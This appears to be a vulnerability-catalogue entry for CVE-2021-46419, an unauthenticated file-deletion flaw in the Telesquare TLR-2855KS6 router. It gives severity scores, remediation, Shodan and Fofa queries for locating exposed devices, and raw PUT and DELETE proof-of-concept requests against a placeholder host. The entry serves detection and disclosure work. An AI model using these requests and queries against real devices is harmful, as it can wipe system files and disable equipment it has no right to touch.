🔙 목록으로 돌아가기

CVE-2021-46419: Telesquare TLR-2855KS6 - Arbitrary File Deletion

TitleTelesquare TLR-2855KS6 - Arbitrary File Deletion
AuthorDhiyaneshDK
SeverityCritical
ImpactUnauthenticated attackers can delete arbitrary files from the Telesquare TLR-2855KS6 device using HTTP DELETE requests, potentially destroying system files and rendering the device inoperable.
RemediationApply firmware updates provided by Telesquare or restrict HTTP DELETE access to the device.
CVSS Score9.1
EPSS Score0.88313
CVE IDCVE-2021-46419
Shodan Querytitle:"Login to TLR-2855KS6"http.title:"login to tlr-2855ks6"
Fofa Queryproduct=="TELESQUARE-TLR-2855KS6"title="login to tlr-2855ks6"product=="telesquare-tlr-2855ks6"
Tags packetstorm cve cve2021 telesquare intrusive vuln

🔍 Vulnerability Description

An unauthorized file deletion vulnerability in Telesquare TLR-2855KS6 via DELETE method can allow deletion of system files and scripts.

🌐 HTTP Request

PUT /cgi-bin/bHeGyalR.txt HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Connection: close
Content-Length: 27
DNT: 1
Accept-Encoding: gzip

38FPNXxdyUNpBbRkNWXPly2VXwI
DELETE /cgi-bin/bHeGyalR.txt HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/3.6.15
Connection: close
DNT: 1
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-46419.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-46419.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A